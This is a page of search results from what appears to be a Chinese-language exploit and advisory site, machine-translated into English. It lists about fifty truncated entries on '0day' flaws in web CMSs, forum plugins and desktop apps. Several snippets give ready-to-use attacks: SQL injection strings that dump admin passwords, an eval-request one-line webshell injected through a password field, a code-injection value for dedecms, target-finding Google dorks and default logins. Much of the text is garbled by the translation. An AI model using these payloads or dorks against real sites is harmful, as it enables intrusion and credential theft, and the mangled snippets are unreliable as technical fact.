7620 matches found
dir cms width byte injection vulnerability-vulnerability warning-the black bar safety net
| Description: unintentionally black box found dircms there is a wide byte to bring the injection problem, although popular over a period of time, looks like now people are not too concerned about this issue. Tested under found there are two places there is a problem: 1. http://demo. dircms...
BMForum Myna 6.0 SQL injection vulnerability-vulnerability warning-the black bar safety net
BMForum is a used in personal, business areas based on the MySQL database to the new PHP Forum program. BMForum Myna 6.0 existSQL injectionvulnerabilities that could lead to sensitive information disclosure. +info: BMForum Myna 6.0 SQL Injection Vulnerability Author: Stephan Sattler Software...
esp cms injection 0day-vulnerability warning-the black bar safety net
In urldecode the role of the non-filtered result in injection form interface/search.php ---- intaglist ---- $tagkey( Urldecdoe after processing directly into SQL statement, the injection formedcode omitted Test: http://localhost/espcms/index.php?ac=search&at=taglist&tagkey=dd%2 5 2 7,%2527dd%2 5 ...
EggAvatar for vBulletin 3.8. x SQL injection vulnerability-vulnerability warning-the black bar safety net
vBulletin is a famous commercial Forum app for vBulletin 3.8. x EggAvatar plug-ins existSQL injectionvulnerabilities that could lead to sensitive information disclosure. +info: EggAvatar for vBulletin 3.8. x SQL Injection Vulnerability +poc: view source print? | 0 1 | !/ usr/bin/env perl ---|--- ...
5UCMS <= v1. 2. 2 0 2 4 background not validation and SQL injection-vulnerability warning-the black bar safety net
| Brief description: The background file does not do verification, it has been filtered does not strictly lead toSQL injection Detailed description: File location admin/ajax. asp 2 4 row Case "modeext" .. 2 6 row ecid=ReplaceRequest"cid","'","" 2 7 row cid=ReplaceRequest"id","'","" .. .. 3 1 The...
iwebshop0. 7. 7 injection 0day-vulnerability warning-the black bar safety net
Use method: 1, the first casual look at a product,and then access the 2, the use of cookies by the browser, you will find inside will be more similar to"iwebhisgoods2 2this number is your access to the product id=1 2 8 2 2 8 2 7 6 2"Project 3, the first in the"2 2"rear add a single quotes, so tha...
5UCMS <= v1. 2. 2 0 2 4 background not validation and SQL injection-vulnerability warning-the black bar safety net
Brief description: The background file does not do verification, it has been filtered does not strictly lead toSQL injection Detailed description: File location admin/ajax. asp 2 4 row Case "modeext" .. 2 6 row ecid=ReplaceRequest"cid","'","" 2 7 row cid=ReplaceRequest"id","'","" .. .. 3 1 The li...
PHPWind v7. 5 / v8. 0 vulnerability EXP-vulnerability warning-the black bar safety net
PHPWind v7. 5 / v8. 0 vulnerability EXP theme keywords: phpwind7. 5 Affected version: PHPWind v7. 5 / v8. 0 Command :php pking.php user passhttp://www. xxxx. com/ pking.php: Copy the contents to the clipboard the program code ? php echo" Info: Poc for Phpwind remote command execution Test:...
PhpSou search engine v1. 0 back door 0day-vulnerability warning-the black bar safety net
See the forum for someone to analyze PhpSou search engine this app, download it down see, do not look do not know. Backdoor code exists in the include\global. func. php in the bottom. Has figure has truth ! Don't know if the system programmer to stay...evil. Official website http://www. phpsou. c...
SiteServer CMS system 0day-vulnerability warning-the black bar safety net
Detail: with the previous move is easy as registered member you can use xx. asp style registration. While we upload the attachments images also are in accordance with our member name to store. Then the tragedy of 0day is produced. The use of an IIS parsing properties! Use way: The first to enter...
A lot of Taobao guest program upload vulnerability and fix-vulnerability warning-the black bar safety net
| Official website: Vulnerabilityof the page: admin\uploadpic.php Transfer door: PS:copy pictures horse directly xxx.php upload capture address! Fix: uploadvulnerabilityto fix please see this site related articles ---...
Gmail Xss vulnerability can cause the user to be hijacking-vulnerability warning-the black bar safety net
Brief description: Google recently quietly fix the Gmail there is a seriousxssproblems that may lead to hijacking of user accounts Detailed description: ! DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd" html lang="zh-Hans" head script...
DedeCms v5. 6 embed malicious code execution vulnerabilities and fixes-vulnerability warning-the black bar safety net
Published:2011-03-02 Affected version: DedeCms v5. 6 vulnerability description: In the upload software of the Local, the local address not be effectively verified, it can be maliciously used reference toby57 Test method: Registered members, upload software: the local address filled in...
iPhone / iPod touch TIOD v1. 3. 3 directory traversal vulnerability-vulnerability warning-the black bar safety net
TIOD is an iPhone / iPod touch remote directory browsing software of. TIOD v1. 3 There is a directory traversal vulnerability that could lead to sensitive information disclosure. +info: Exploit Title: TIOD v1. 3. 3 for iPhone / iPod touch, Directory Traversal Date: 03/03/2011 Author: R3d@l3rt,...
ewebeditor 2.8 commercial version of the backend plug in a word and fix-vulnerability warning-the black bar safety net
Affected version:2.8 Business Edition Attack use:login background, click on Change Password---new password set to 1":eval request"a"’ Set after the success, the access to asp/config. asp file, the word Trojan is written to this file inside the In this paper, ewebeditor commercial version...
boblog after the injection of COOKIE spoofing vulnerability-vulnerability warning-the black bar safety net
Published author: the mind Affected versions: boblog latest Official website: http://www.bo-blog.com// Vulnerability type: COOKIE spoofing Vulnerability description: Code index. php code if $go @list$job, $itemid=@explode'', basename$go; Originally injected into the statement for the index. php?...
Shuo Mei web site management system SomiCMS Enterprise Edition v3. 1 0day-vulnerability warning-the black bar safety net
Author: IDEA4 Bulk to take the shell,the keyword your looking for you can! The use method is as follows Copy the code about. php? aid=-1 union select 1,concatusername,0x20,password,3,4,5,6,7 from somiuser limit 0,1/...
FeiXun enterprise website management system v2011 upload vulnerabilities pass to kill 0day-vulnerability warning-the black bar safety net
Affected version: v2011 Official website: http://www.webhtm.cn PRODUCT DESCRIPTION: Suitable Agent building a Business Site of the enterprise source code, The aspect of the practical! Program description: 1. Features: simplified and Traditional Chinese switch, the product display system, news...
phpcms 2 0 0 8 sp4 explosive paths and arbitrary file deletion vulnerabilities and fixes-vulnerability warning-the black bar safety net
phpcms 2 0 0 8 sp4 explosive paths and arbitrary file deletion vulnerability and fix Affected versions: phpcms 2 0 0 8 sp4 Official address: www.phpcms.cn Vulnerability type: explosive paths and arbitrary file deletion Vulnerability Description: a certain page, not as fault-tolerant processing...
Alcassoft's SOPHIA CMS SQL injection vulnerability-vulnerability warning-the black bar safety net
Alcassoft's SOPHIA is an international, powerful content management system. Alcassoft's SOPHIA in dsppage. cfm file existssql injectionvulnerabilities that could lead to sensitive information disclosure. Title : Alcassoft's SOPHIA CMS is Vulnerable to SQL Injection Found by: p0pc0rn 24/02/2011 We...
dedecms latest vulnerability-vulnerability warning-the black bar safety net
Say the following using the method: registered members, upload software: the local address is filled into a/dede:linkdede:toby57 name="'=0;phpinfo;//"x/dede:toby57, published after the review or modification can be performed. Generated by parsing the file content is as follows: ! After the succes...
ASP may appear in an included vulnerability(Server. execute)-vulnerability warning-the black bar safety net
author: bin % Server. executerequest“file” % With the include distinction, it can dynamically include files. Is included file inside the executable ASP code, in a foreign source in use. include.asp?file=./1.txt 1.txt %response. writenow%...
boblog arbitrary variable overwrite vulnerability analysis-vulnerability warning-the black bar safety net
| by Ryatpuretot mail: puretot at gmail dot com team: http://www.80vul.com Find time 2008-10-02 Publication Date 2011-02-27 The vulnerabilities affect version 2.1.0 2.1.1 The state has been patched Vulnerability code is as follows: // go.php $qurl=$SERVER"REQUESTURI"; @list$relativePath,...
RW-Download 4.0.6 sql injection vulnerability and fix-vulnerability warning-the black bar safety net
| RW-Download is a supporting template and multilanguage version of upload and download system. RW-Download 4.0.6 version of the index. php existssql injectionvulnerabilities that could lead to sensitive information disclosure. +info: //Title ||= RW-Download v4. 0. 6 = index.php SQL Injection...
Alcassoft's SOPHIA CMS SQL injection vulnerability and fix-vulnerability warning-the black bar safety net
| Alcassoft's SOPHIA is an international, powerful content management system. Alcassoft's SOPHIA in dsppage. cfm file existssql injectionvulnerabilities that could lead to sensitive information disclosure. +info: Title : Alcassoft's SOPHIA CMS is Vulnerable to SQL Injection Found by: p0pc0rn...
K6dvd music network 0day(anti-injection embarrassing)-vulnerability warning-the black bar safety net
Long time no see code to post before, I believe there should be a lot of seniors already know this BUG!! Ps:although I haven't found, perhaps is too long not concerned about the network! Oh K6dvd television system is the domestic good music leave management system! Today fish called me this week...
Discuz X Series Xss vulnerability small collection-vulnerability warning-the black bar safety net
/ Title:Discuz X Series Xssvulnerability small collection Author:sogili@0xsec From:0xsec.org Website:0xsec.org & amp; sogili.com / Discuz X version series smallXssthe vulnerability of the collection. Relates to the Discuz x1. 0 & x1. 5 version. Plus QQ bookmarkXssone. sogili whine when you Tinker...
Use the IIS semicolon parsing upload vulnerability analysis-vulnerability warning-the black bar safety net
First look at the following a very common file upload extension filter code: fileExt=lcaseofile. FileExt arrUpFileType=splitUpFileType,"|" for i=0 to uboundarrUpFileType if fileEXT=trimarrUpFileTypei then EnableUpload=true exit for end if next if fileEXT="asp" or fileEXT="asa" or fileEXT="aspx" o...
iPhone PDF Reader Pro 2.3 directory traversal vulnerability-vulnerability warning-the black bar safety net
iPhone PDF Reader Pro 2.3 is a iPhone on a PDF file reading software,iPhone PDF Reader Pro 2.3, there is a directory traversal vulnerability,which can lead to sensitive information disclosure. +info: Software : iPhone PDF Reader Pro 2.3 Type of vunlnerability : Directory Traversal Tested On :...
Razer official site mysql injection vulnerability and fix-vulnerability warning-the black bar safety net
Brief description: sql query filter is not strict lead to typical blinds,you can get the database information. Detailed description: the aid parameter of the presence of the injection, nothing to explain. Vulnerability to prove:this page will return to normal this page returns an exception...
DISCUZX1. 5 local file inclusion vulnerability-vulnerability warning-the black bar safety net
DISCUZX1. 5 local file inclusion, of course, is conditional, is to use a file as a cache. configglobal.php $config'cache''type' = 'file'; function cachedata$cachenames ...... $isfilecache = getglobal'config/cache/type' == 'file'; ...... if$isfilecache $lostcaches = array; foreach$cachenames as...
Discuz entertainment Hall plug-in V1. 0 injection vulnerability and fix-vulnerability warning-the black bar safety net
| Author:0x0F From:0xsec.org Vulnerability Details: sid variable without filtration generated SQL injection. Exploits:http://site/plugin. php? id=huxhall:huxhall&sid=1 You know. KeyWords:inurl:huxhall:huxhall Related companies:Le tour network HappyYux.com Repair Methods:filtration Has a patch:No...
Galilery 1.0 local file inclusion vulnerability-vulnerability warning-the black bar safety net
Galilery is a PHP prepared by the open source photo album system, Galilery 1.0 the presence of local file inclusion vulnerability that may lead to sensitive information disclosure. +info: Galilery 1.0 Local File Inclusion Vulnerability $ cat 15lfigalilery.1.0.txt exploit title: local file include...
Woltlab Burning Board 2.3.6 addon SQL injection vulnerability-vulnerability warning-the black bar safety net
Woltlab Burning Board is a PHP, MySQL backend support of the WEB forum program. Woltlab Burning Board 2.3.6 in the hilfsmittel. php plug-ins existSQL injectionvulnerabilities that could lead to sensitive information disclosure. +info: Woltlab Burning Board 2.3.6 Addon hilfsmittel.php SQL Injectio...
DIY Web CMS multiple security vulnerabilities-vulnerability warning-the black bar safety net
DIY Web is a simple to use asp to develop the content management, DIY Web, the presence of multiple security vulnerabilities that could lead to sensitive information disclosure. +info: DIY Web CMS Multiple Vulnerabilities SQL and XSS in DIY Web CMS found by : p0pc0rn 22/2/2011 web :...
Eventum Issue Tracking System 2.3.1 stored cross site scripting vulnerability-vulnerability warning-the black bar safety net
Eventum Issue Tracking System is a user-friendly interface and flexible bug tracking system, it can help the development team to quickly organize tasks and bugs. Eventum Issue Tracking System 2.3.1 the presence of the stored cross site scripting vulnerability that could cause users to...
Escort Directory CMS SQL injection vulnerability-vulnerability warning-the black bar safety net
Escort Directory CMS is a dedicated to the a+site-built CMS, Escort Directory CMS existsql injectionvulnerabilities that could lead to sensitive information disclosure. +info: Exploit Title: Escort Directory CMS SQL Injection Vunerability Google Dork: "Powered By Escort Web design" Platform: php...
Chi Sepang international series system to kill exploit 0day and fix-vulnerability warning-the black bar safety net
Chi Sepang international series system to kill exploit 0day and fix Brief description: this vulnerability should be a series system to kill, in the background Annex to the upload not the file format limit, can lead to upload any type of file. Use method: can be utilized where there are two, one i...
Days buy the background Getshell security-vulnerability warning-the black bar safety net
by k4shifzw. s. t bbs.wolvez.org The last said to-day buy back get the shell. Background injection to the database to insert the code. exp need to fill out the four parameters $host,$path,$formhash, a$cookie. After the submission, the front Desk login code execution. ? php / TianTian Tuangou...
XYCMS law firm built Station system V1. 0 multi-flaw-vulnerability warning-the black bar safety net
XYCMS law firm built Station system V1. 0 http://down.admin5.com/asp/71909.html B0mbErM@n ; 2011-2-18 eWebEditor http://127.0.0.1:99/system/xyeWebEditor/admin/login.asp User=XY2010 Pass=XY2010 XSS http://127.0.0.1:99/online.asp Qq:XSS Mail:XSS Photo:XSS Contents:XSS Eval...
plesk virtual host Management Platform 0day-vulnerability warning-the black bar safety net
1,inhttp://xxxxxx.com:8880here, the default administrator account password is the admin Password stepu 2, in thehttps://xxxxx.com:8443 mssql version Account ' union select top 1 login+char1 2 4+passwd from adminaliases-- Error,broken account password After landing server - remote desktop account...
Chi Sepang international series system to kill the vulnerability 0day-vulnerability warning-the black bar safety net
| This vulnerability should be a series system to kill, in the background Annex to the upload not the file format limit, can lead to upload any type of file. Use method: can be utilized where there are two, one is the background upload attachments. Another is to directly access the http://domain...
Multi Agent System city. asp SQL injection vulnerability and fix-vulnerability warning-the black bar safety net
Author: R4dc0re Information Description: a Multi-Agent System of the city. asp the reason there may be the use ofSQL injectionis due to this file and there is insufficient filtering of user requests query caused. The use of this vulnerability may allow an attacker to use to the server application...
DYHB-blog V1. 4 Write the horse vulnerability-vulnerability warning-the black bar safety net
Just download come start to see it. Luck really good。。。。 public.php file visitors to publish the article..... Classic white look at the code | | if$view=="save" ---|--- | //Post form data ---|--- | $title= getargpost 'title' ; ---|--- getargpost is to get the POST Without any filtering And then...
Panda local to mention the right vulnerability-vulnerability warning-the black bar safety net
This article will bring to you is a Panda local to mention the right vulnerability. I think this vulnerability might be for we provide the right help, it'll tell you in detail about, after all, the more an idea is not anything bad. Compile EXP First, look on the vulnerability description. Panda t...
Simple-Log 1.2 delay injection vulnerability-vulnerability warning-the black bar safety net
Vulnerability file: /user.php ! Continue to follow issetmember a function of usage. The interception of the part of the code. /includes/base.function.php ! Not a deeper layer of the call, lest everyone see the mess. As long as the POST submitted in the admin +injected into the statement to make i...
bo-blog upload vulnerability-vulnerability warning-the black bar safety net
| Attention to the following recent of several large cattle site was hacked the message, The know with bo-blog, just under the sleeve 2. 1. 1 See, found a point problem. This program and F2blog the presence of the same upload bug, just use the hard point, to a certain permissions. But the...
Red button DVD software Toolkit DLL hijacking-vulnerability warning-the black bar safety net
/ Red button DVD Software Toolkit DLL Hijacking Exploit iacenc.dll Author : anT!- Tr0J4n Inj3ct0r Site: http://77.120.101.55 Email : D3v-PoinTathotmaild0tcom & C1EHatHotmaild0tcom Greetz : Dev-PoinT.com inj3ct0r.com thanks : r0073r ; Sid3^effects ; L0rd CrusAd3r ; all Inj3ct0r 3 1 3 3 7 Member Ho...
Rising online virus scanner Active - X denial of service-vulnerability warning-the black bar safety net
ProgID: RavOLCtlLib. RavOnline ClassID: 9FAFB576-6 9 3 3-4CCC-AB3D-B988EC43D04E Member: Scan File: C:\Programme\Rising\RavOL\RavOLCtl.dll script safe: true init the safe: true Because Bullshit like this is unsaleable and i don't want to waste time coordinating patches with this vendor this is a...
Windows Vista / 7 lpksetup. exe the DLL-hijacking-vulnerability warning-the black bar safety net
/ Exploit: Windows Vista/7 lpksetup.exe oci.dll DLL Hijacking Vulnerability Extension: the . mlc Author: Tyler Borland [email protected] Date: 10/20/2010 Tested on: Windows 7 Ultimate Windows Vista Ultimate/Enterpries and Windows 7 Enterprise should be vulnerable as well Effect: Remote Code...